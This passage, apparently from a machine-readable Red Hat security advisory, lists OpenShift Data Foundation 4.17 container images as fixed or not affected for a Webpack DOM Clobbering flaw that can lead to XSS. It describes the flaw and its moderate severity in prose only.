"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", 